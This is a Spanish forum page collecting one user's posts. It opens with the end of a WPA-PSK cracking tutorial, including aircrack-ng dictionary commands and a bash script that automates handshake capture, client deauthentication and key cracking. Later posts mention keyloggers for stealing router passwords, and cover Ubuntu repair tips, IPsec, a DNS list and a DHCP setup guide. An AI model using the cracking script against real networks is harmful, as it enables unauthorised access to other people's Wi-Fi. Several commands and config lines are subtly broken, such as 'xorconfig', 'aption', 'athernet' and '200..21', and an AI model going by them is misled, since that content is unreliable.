capturaremos el handshake.

¿Cómo sabemos que ya lo hemos capturado?

Pues en la ventana donde tenemos corriendo el airodump-ng, arriba a la derecha, veremos algo así:
CH 1 ] [ Elapsed: 14 mins ][ 2009-03-08 ][ WPA handshake: 00:1B:02:93:AF:9C

Una vez que nos aparezca eso, ya podemos cerrar todo, en el archivo redWPA-01.cap ya tendremos
el dichoso handshake =)

---------------------------------------------------------------------------------


---[ 0x04: Conseguir clave con diccionario ]


Una vez teniendo el handshake, ya podemos utilizar un diccionario de posibles claves
para que aircrack-ng compruebe haber si alguna de las claves del diccionario coincide
con la del AP.

¿Qué diccionario usar? pues el de john the ripper, alguno propio, hay muchos...
aunque se supone que esto es para comprobar la seguridad de tu red wireless y ya te tendrás
que saber de sobra tu clave.

La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres.

Empecemos...

Si ejecutamos:
Código: [Seleccionar]
# aircrack-ng redWPA-01.cap
Podremos ver que tenemos un handshake:

---------
Código: [Seleccionar]
Opening wpa-hand.cap
Read 553 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:02:93:AF:9C  ap_labs                WPA (1 handshake)  <------

Choosing first network as target.

Opening wpa-hand.cap
Please specify a dictionary (option -w).


Quitting aircrack-ng...
---------

Uso de aircrack-ng con diccionario:
Código: [Seleccionar]
# aircrack-ng -w <ruta_diccionario> <archivo_de_capturas>

Suponiendo que nuestro archivo de datos capturados donde se encuentra el handshake se llama
redWPA-01.cap, lo ejecutaremos de la siguiente forma:

Código: [Seleccionar]
# aircrack-ng -w diccionario.lst redWPA-01.cap
Entonces aquí ya aircrack-ng se pondrá a comprobar las posibles claves del diccionario hasta obtenerla.
Una vez obtenida, nos aparecerá lo siguiente:

---------

                                 
Código: [Seleccionar]
Aircrack-ng 1.0 rc1


                   [00:00:00] 0 keys tested (0.00 k/s)


                           KEY FOUND! [ clave__ap ]


      Master Key     : 18 D4 E8 70 A0 B5 D2 26 4C 61 BA 85 5F 36 8F D9
                       DA 56 2A D2 51 B6 01 B6 A9 E8 61 B3 CD 92 7D 09

      Transcient Key : DA 5E 56 09 35 9E 2D 9F 35 B0 C5 9E A9 41 71 B5
                       8A 8C B6 1B B5 A0 D2 C0 53 47 C6 05 CC 2C CA C0
                       C7 41 04 B2 F5 7D 44 DF 71 C5 11 78 5D DE A1 D0
                       F9 2E BE 54 22 46 82 24 35 91 7E 93 21 9D BF 78

      EAPOL HMAC     : 6A 31 F7 C0 C8 A7 83 37 50 FD 44 C3 8C 7D 2B 26

---------

Hay ya vemos que encontro la clave y que es 'clave__ap'.
Como vemos el proceso de obtener una clave WPA/WPA2-PSK no es tan dificil siempre y cuando
sepamos nuestra clave, ya que si no la sabríamos este proceso podría durar horas, dias e incluso semanas
depende el diccionario que usemos.

---------------------------------------------------------------------------------



---[ 0x05: airoWPA-PSH.sh ]

Para simplificar un poco este proceso de obtención de la clave, hice un pequeño script en bash
sencillo que te puede servir si eres un poco vago :P

<-----------------airoWPA-PSK.sh--------------------->
Código: [Seleccionar]
#!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x <ka0x01[at]gmail.com>

if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi

comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m[*] Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}

monitor(){
airmon-ng start $INTER
clear
menu
}

handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}

crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"

LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done

xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}

menu(){
echo -e "\n[*] Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Obtener clave con diccionario"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

read -p "opcion> " OPCION

case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

esac
}

interfaces
menu

# __EOF__
<------------------------------------------------>

---------------------------------------------------------------------------------


---[ 0x06: Fin ]

Bueno pues eso es todo, los pasos son bastantes sencillos, cualquier duda pueden
entrar a la web de aircrack-ng (http//www.aircrack-ng.org) donde podrán encontrar abundante documentación
o mismamente enviándome un email.

Espero que se entienda.

Un saludo!

# ka0x

---------------------------------------------------------------------------------

__EOF__

# milw0rm.com [2009-03-09]

16
Buscando por google si es que hay algun método de aumentar tu linea de internet por ejm: de 1 MB a 4 MB , me dí con la sorpresa de que algunas personas juran haber aumentado su línea sin pagar ningun centavo a su proveedor de internet. Algunos afirman haberlo logrado haciendo algunas configuraciones a su router (información que no comparten  ;D), otras dicen que cambiando el DNS por otros menos convencionales lo han logrado, pero este última idea no comparto ya que solo aumentan su velocidad de ver mas rápido las webs que visitan y no la linea. Bueno en fín les hago la misma pregunta amigos, será verdad que se puede aumentar tu linea de internet sin pagar mas?¿  ;)

Hola Yiruz, este caso podria darse segun el modo de autenticación, es decir, de la forma de acceder a router y tambien quien controla este. Te explico, hay routers que solo lo configuran los tecnicos, y de esta forma ellos se encargan de esa labor y te asigna el ancho de banda contratado pero.. en el router, se de casos, en los cuales un user intenta "obtener" user y pass, mediante keylogger para despues el poder acceder a la configuración del router y de este modo configurarlo a su manera XD. Creo que es a esto a lo que te refieres. Sobre las DNS no creo, si pueden haber notado el cambio de "unos a otros" pero no aumentar el ancho de banda, ya que esto no es la funcion de los DNS.

Un $alu2

17
GNU/Linux / Reparar entorno gráfico Ubuntu/Kubuntu
« en: Abril 23, 2010, 05:03:16 pm »
Reparar entorno gráfico Ubuntu/Kubuntu


Los S.O que engloban "el mundo Linux", aportan muchas ventajas respecto a S.O MS Windows, pero como todos, son imperfectos, a continuación, voy a mostrar posibles soluciones para reparar el entorno gráfico de nuestro Linux, puede pasar que al iniciar nuestro sistema Linux, nos encontremos con la sorpresa de que no inicia la "interfaz gráfica" de este, ya sea por instalación defectuosa de un driver, error en algun archivo del sistema que afecte a tal aspecto, etc. Aconsejo que nunca esta mal tener esta información que recopilé, ya que puede ser valiosa a la hora de reparar nuestro sistema:

1º Solución: "Reparar entorno de las Xs", resumiendo, esto segun los paámetros que utilizamos puede ser a la reinstalación de estas:

sudo xorconfig

o

sudo dpkg-reconfigure xserver-org

2º Solución: "Error en el inittab":

Ambos los encontramos en: /etc/inittab

Cambiar el valor:

Default runlevel.(Do not set to 0 or 6)
id:initdefault:

a:

Default runlevel.(Do not set 0 or 6)
id:4:initdefault.

3º Solución:

sudo /etc/init.d/gdm start

->Enter Pass

aparece:

starting Gnome Display Manager

->Exit

4º Solución:

sudo gdm

sudo xorconfig

E indicamos la siguiente ruta:

/dev/input/mice

o de no ser la anterior, esta:

/dev/psavx

5º Solución:

Modo Recovery o Modo de recuperación, el cual se muestra al inicio del sistema.

6º Solución: "Limpiar y actualizar el sistema":

sudo aptitude clean

sudo aptitude update

sudo aptitude full-upgrade

->sudo reboot

7º Solución:

sudo dpkg-reconfigure xserver-xorg

->Si [Autodetecta el hardware de video]

->No [Buscar un controlador de forma manual]

Valores que podemos ver:

*Configurar nuestra tarjeta
*Recuperar la configuración predeterminada
*Para aceleración 3D controladores privativos

1->Seleccionar el modelo de la targeta gráfica.

2->Cuando indique identificar la tarjeta de video, deberemos borrar el nombre de la presente y escribimos nv en caso de que esta sea nvidia, o vesa en caso de que sea ATI.

3->En BUS ID, memoria asignada y demás parámetros, los dejamos por defecto y en >Framebuffer<>No<>En Teclado y ratón, lo dejamos por defecto, para >Monitor<>En la siguiente ventana marcamos "single" e indicamos la resolución de la PC

Nota: Mientras menor sea esta, puede ser mejor.
Nota: Con la barra espaciadora, indicamos la "resolución real" o mas apropiada a utilizar.

6->La profundidad de color, indicamos las mas alta.

7->Reiniciar el equipo:

sudo reboot


Un $alu2.

18
Redes y antenas / IPsec [Internet Protocol security]
« en: Abril 23, 2010, 04:56:05 pm »
IPsec [Internet Protocol security]



IPsec (abreviatura de Internet Protocol security) es un conjunto de protocolos cuya función es asegurar las comunicaciones sobre el Protocolo de Internet  (IP) autenticando y/o cifrando cada paquete IP en un flujo de datos. IPsec también incluye protocolos para el establecimiento de claves de cifrado.


Arquitectura de seguridad

IPsec está implementado por un conjunto de protocolos criptográficos para (1) asegurar el flujo de paquetes, (2) garantizar la autenticación mutua y (3) establecer parámetros criptográficos.

La arquitectura de seguridad IP utiliza el concepto de asociación de seguridad (SA) como base para construir funciones de seguridad en IP. Una asociación de seguridad es simplemente el paquete de algoritmos y parámetros (tales como las claves) que se está usando para cifrar y autenticar un flujo particular en una dirección. Por lo tanto, en el tráfico normal bidireccional, los flujos son asegurados por un par de asociaciones de seguridad. La decisión final de los algoritmos de cifrado y autenticación (de una lista definida) le corresponde al administrador de IPsec.

Para decidir qué protección se va a proporcionar a un paquete saliente, IPsec utiliza el índice de parámetro de seguridad (SPI), un índice a la base de datos de asociaciones de seguridad (SADB), junto con la dirección de destino de la cabecera del paquete, que juntos identifican de forma única una asociación de seguridad para dicho paquete. Para un paquete entrante se realiza un procedimiento similar; en este caso IPsec toma las claves de verificación y descifrado de la base de datos de asociaciones de seguridad.

En el caso de multicast, se proporciona una asociación de seguridad al grupo, y se duplica para todos los receptores autorizados del grupo. Puede haber más de una asociación de seguridad para un grupo, utilizando diferentes SPIs, y por ello permitiendo múltiples niveles y conjuntos de seguridad dentro de un grupo. De hecho, cada remitente puede tener múltiples asociaciones de seguridad, permitiendo autenticación, ya que un receptor sólo puede saber que alguien que conoce las claves ha enviado los datos. Hay que observar que el estándar pertinente no describe cómo se elige y duplica la asociación a través del grupo; se asume que un interesado responsable habrá hecho la elección.

Propósito de diseño

IPsec fue proyectado para proporcionar seguridad en modo transporte (extremo a extremo) del tráfico de paquetes, en el que los ordenadores de los extremos finales realizan el procesado de seguridad, o en modo túnel (puerta a puerta) en el que la seguridad del tráfico de paquetes es proporcionada a varias máquinas (incluso a toda la red de área local) por un único nodo.

IPsec puede utilizarse para crear VPNs en los dos modos, y este es su uso principal. Hay que tener en cuenta, sin embargo, que las implicaciones de seguridad son bastante diferentes entre los dos modos de operación.

La seguridad de comunicaciones extremo a extremo a escala Internet se ha desarrollado más lentamente de lo esperado. Parte de la razón a esto es que no ha surgido infraestructura de clave pública universal o universalmente de confianza (DNSSEC fue originalmente previsto para esto); otra parte es que muchos usuarios no comprenden lo suficientemente bien ni sus necesidades ni las opciones disponibles como para promover su inclusión en los productos de los vendedores.

Como el Protocolo de Internet no provee intrínsecamente de ninguna capacidad de seguridad, IPsec se introdujo para proporcionar servicios de seguridad tales como:

   1. Cifrar el tráfico (de forma que no pueda ser leído por nadie más que las partes a las que está dirigido)
   2. Validación de integridad (asegurar que el tráfico no ha sido modificado a lo largo de su trayecto)
   3. Autenticar a los extremos (asegurar que el tráfico proviene de un extremo de confianza)
   4. Anti-repetición (proteger contra la repetición de la sesión segura).

Modos

Así pues y dependiendo del nivel sobre el que se actúe, podemos establecer dos modos básicos de operación de IPsec: modo transporte y modo túnel.
Modo transporte [editar]

En modo transporte, sólo la carga útil (los datos que se transfieren) del paquete IP es cifrada y/o autenticada. El enrutamiento permanece intacto, ya que no se modifica ni se cifra la cabecera IP; sin embargo, cuando se utiliza la cabecera de autenticación (AH), las direcciones IP no pueden ser traducidas, ya que eso invalidaría el hash. Las capas de transporte y aplicación están siempre aseguradas por un hash, de forma que no pueden ser modificadas de ninguna manera (por ejemplo traduciendo los números de puerto TCP y UDP). El modo transporte se utiliza para comunicaciones ordenador a ordenador.

Una forma de encapsular mensajes IPsec para atravesar NAT ha sido definido por RFCs que describen el mecanismo de NAT transversal.
Modo túnel [editar]

En el modo túnel, todo el paquete IP (datos más cabeceras del mensaje) es cifrado y/o autenticado. Debe ser entonces encapsulado en un nuevo paquete IP para que funcione el enrutamiento. El modo túnel se utiliza para comunicaciones red a red (túneles seguros entre routers, p.e. para VPNs) o comunicaciones ordenador a red u ordenador a ordenador sobre Internet.

Fuente

19
Redes y antenas / Listado de DNS
« en: Abril 23, 2010, 04:55:09 pm »
En ocasiones es posible que el servidor/es DNS que tiene asignado por defecto la configuración de conexión de red, por algun motivo no resuelve las direcciones como a de hacerlo, a continuación, se muestra una lista en la cual aparecen distintos servidores DNS para distintos ISP.



LISTADO DE DNS


Telefónica 80.58.0.97 97.Red-80-58-0.pooles.rima-tde.net
SuperBanda 212.4.96.22 ns1.grupalia.com
Tiscali 212.166.64.2 dns2.tiscali.es
Terra 213.4.141.1 dns2.terra.es
Orange 62.37.228.22 m2cachedns2.uni2.es
Terra 213.4.132.1 dns1.terra.es
Orange 62.37.228.22 m2cachedns2.uni2.es
Jazztel 87.216.1.65 [Unknown]
Orange 62.37.236.200 dns2.wanadoo.es
Tiscali 212.166.64.1 dns1.tiscali.es
ConexiónFutura 193.43.232.4 dns1.conexionfutura.com
Telefónica 80.58.61.250 250.Red-80-58-61.staticIP.rima-tde.net
Iberbanda 217.11.96.234 dns.mad.iberbanda.es
Comunitel 212.145.4.98 ns2.comunitel.net
ONO 62.42.230.135 dns01.ono.com
Orange 62.37.237.140 dns1.wanadoo.es
Jazztel 62.14.2.1 dns1.inversas.jazztel.es
Orange 62.37.225.58 pdns03pub.uni2.es
Telefónica 213.0.184.68 minerva.ttd.net
Telefónica 80.58.61.254 254.Red-80-58-61.staticIP.rima-tde.net
ONO 62.42.230.136 newsf01.ono.com
Iberdrola 193.127.102.104 ns2.presenzia.net
Arrakis 195.5.64.2 ns1.landsraad.net
ONO 62.42.230.24 resolv.ono.com
ONO 62.42.63.51 dns03.ono.com
Jazztel 62.14.4.64 dnscache1.jazzvisp.com
Jazztel 62.14.63.145 [Unknown]
Arsys 217.76.129.131 dns8.servidoresdns.net
ConexiónFutura 213.139.0.51 ns0.es.easynet.net
Telefónica 194.179.1.101 artemis.ttd.net
OpenForYou 213.195.64.129 dns1.ibercom.com
Arsys 217.76.128.131 dns7.servidoresdns.net
OpenForYou 213.195.79.129 dns2.ibercom.com
ConexiónFutura 213.139.0.52 ns1.es.easynet.net
Telefónica 80.58.0.33 33.Red-80-58-0.pooles.rima-tde.net
Adam 212.36.64.17 dns2.adam.es
Arsys 217.76.128.4 atlante.servidoresdns.net
Comunitel 212.145.4.97 ns1.comunitel.net
Iberdrola 213.172.33.35 ns2.neo.es
Arsys 217.76.129.4 prometeo.servidoresdns.net
Telefónica 213.0.184.69 artemis.ttd.net
Iberdrola 213.172.33.34 ns1.neo.es
Orange 62.37.225.57 dns2.comtenidos.com
Telefónica 80.58.32.33 33.Red-80-58-32.pooles.rima-tde.net
Reterioja 212.21.224.4 sn2.reterioja.es
Iberbanda 217.11.108.234 dns.bcn.iberbanda.es
TeleCable 212.89.0.31 dns.telecable.es
AunaCable 62.81.31.250 dns.iddeo.es
Telefónica 80.58.32.97 97.Red-80-58-32.pooles.rima-tde.net
Telefónica 194.179.1.100 minerva.ttd.net
Euskaltel 212.55.8.133 dns2.euskaltel.es
Reterioja 212.21.224.3 sn1.reterioja.es
Terra 195.235.113.3 dns.terra.es
Adam 212.36.64.16 dns1.adam.es
Orange 62.37.225.56 dns.comtenidos.com
Jazztel 62.14.4.65 dnscache2.jazzvisp.com
SuperBanda 212.4.96.21 ns2.grupalia.com
Euskaltel 212.55.8.132 dns.euskaltel.es
R 212.51.33.106 ns-cor.net.mundo-r.com
Arrakis 195.5.64.6 ns2.landsraad.net
Acens 217.116.0.177 ns2.acens.net
Orange 62.37.228.20 m2cachedns.uni2.es
Iberdrola 193.127.102.45 ns1.presenzia.net
Acens 217.116.0.176 ns1.acens.net
R 212.51.33.73 ns.mundo-r.com
Tele2 130.244.127.169 dns2.swip.net
Tele2 130.244.127.161 dns1.swip.net
ONO 62.42.63.52 [Unknown]
AunaCable 62.81.16.131 131-16-81-62.libre.auna.net
Ya.com 62.151.20.6 ns2.bs-ya.com
AunaCable 62.81.0.35 35-0-81-62.libre.auna.net
Ya.com 62.151.2.65 dns.yaonline.es
Ya.com 62.151.20.7 ns.bs-ya.com
Ya.com 62.151.8.100 dns2.ya.com
AunaCable 62.81.0.36 36-0-81-62.libre.auna.net
Ya.com 62.151.2.8 dns.ya.com
AunaCable 62.81.16.132 132-16-81-62.libre.auna.net
Telefónica 194.224.52.4 esifw1.tsai.es
Telefónica 194.224.52.6 esifw2.tsai.es
Telefónica 194.224.52.36 ns1.telefonica-data.com
Telefónica 194.224.52.37 ns2.telefonica-data.com
Terra 195.235.96.90 tpdns2.terra.es
AunaCable 62.81.0.1 mayor.red.retevision.es

Fuente

20
Redes y antenas / [Tutorial] Configuracion de servidor DHCP ubuntu
« en: Abril 23, 2010, 04:54:31 pm »

 
Configuracion de servidor DHCP ubuntu

En este manual mostrare como configurar un servidor DHCP en cualquier computador con sistema operativo anfitrion Ubuntu. Antes de empezar vamos a hacer un pequeño repaso de teoria basico:Configuracion de servidor DHCP ubuntu

Servidor: ( Wikipedia )

Citar
En informática, un servidor es una computadora que, formando parte de una red, provee servicios a otras computadoras denominadas clientes

Servidor DHCP: ( ccm.itesm.mx )

Citar
Un servidor DHCP (Dynamic Host Configuration Protocol) se utiliza para asignar direcciones IP a las computadoras de los usuarios cuando éstas arrancan.

Cliente: ( Wikipedia )

Citar
El cliente es una aplicación informática que se utiliza para acceder a los servicios que ofrece un servidor, normalmente a través de una red de telecomunicaciones.

Bueno solo hablaremos de estos terminos, ya podremos empezar a configurar nuestro servidor.

Bueno antes que todo debemos actualizar los repositorios de nuestro S.O con el siguente comando, abrimos una terminal y escribimos lo siguiente:

Citar
sudo apt-get update

Ahora vamos a configurar nuestras interfaces de red. abrimos un terminal y escribimos lo siguiente

Citar
sudo gedit /etc/network/interfaces

ahora nos aparecera un editor de texto con lo siguiente

Citar
auto lo
iface lo inet loopback

ahora tendras que escribir lo siguiente debajo del texto que estaba en el editor de texto plano.

Citar
auto eth0
iface eth0 inet static
adress 192.168.0.10
netmask 255.255.255.0
gateway 192.168.0.1
broadcast 192.128.0.225

Lo que hicimos hay fue  configurar la interface eth0 que es la cableada para que nuestro equipo tuviera como IP estatica 192.168.0.10 , como mascara de red 255.255.255.0, como gateway 192.168.0.1 y como broadcast 192.128.0.225

¿ Y ahora que mas hacemos ?

ahora vamos a reiniciar nuestro servicio de red para que nos reconosca estos cambios que hicismo a la interface de eth0 ( cableada ), abrimos un terminal y escribimos esto.


Citar
sudo /etc/init.d/networking restart

ahora vamos al Synaptic y buscamos dchp3-server y lo aplicamos. despues de ya tener el dchp3-server en nuestro equipo ( es esencial para poder configurar el asignamiento de IP a los Computadores clientes) vamos a modificar el archivodhcp.conf vamos a abrir un terminal y escribimos esto que es para poder abrir el archivo dhcpd.conf abrirlo como super usuario.

Citar
sudo gedit /etc/dhcp3/dhcpd.conf

el archivo lo vamos a configurar para poder asignar las IP por defecto osea que si se conecta se le asignara IP sin ningun problema. el archivo debe quedar asi.

Citar
shared-network miredlocal {
subnet 192.168.0.0 netmask 255.255.255.0 {
options routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option domain-name "lanlocal.red";
option domain-name-servers 200..21.200.2, 200.21.200.79;
option netbios-name-servers 192.168.0.1;
range 192.168.0.11 192.168.0.199;
default-lease-time 21600;
max-lease-time 43200;
}

asi debe quedar si vos lo quieres que asigne IP por defecto pero si quieres asignarsela por MAC tambien se pude, tienes que configurarlo para que tambien las asigne por defecto pero debajo de el texto anterior tiene que colocar lo siguiente.

Citar
host 253 {
aption host-name "m253.local.red";
hardware athernet XX:XX:XX:XX:XX:XX;
fixed-address 192.168.0.253;
{

Bueno ahora despues de haber hablado con la configuracion del servidor vamos a iniciar el servidor. abrimos un terminal y escribes lo siguiente.

Citar
sudo /etc/init.d/dhcpd3-server start

"ejemplo grafico ;)"


Bueno ahora verificamos si el servicio del server esta habilitado.


listo ya tenemos nuestro servidor =) que tal si jugamos un poco?, bueno cositas basicas, con el siguiente comando podremos ver quienes estan conectados a nuestro servidor

Citar
sudo arp


y vamos a verificar la conexion de alguno de nuestros clientes


espero que esta documentacion les pueda servir alguna vez =)

-------------------------------------> by Progresive Death <-------------------------------------

Manual basado en la Guia_ubuntu_Server de Alanmein


Autor:Progresive_death
Fuente: CPH

Páginas: [1] 2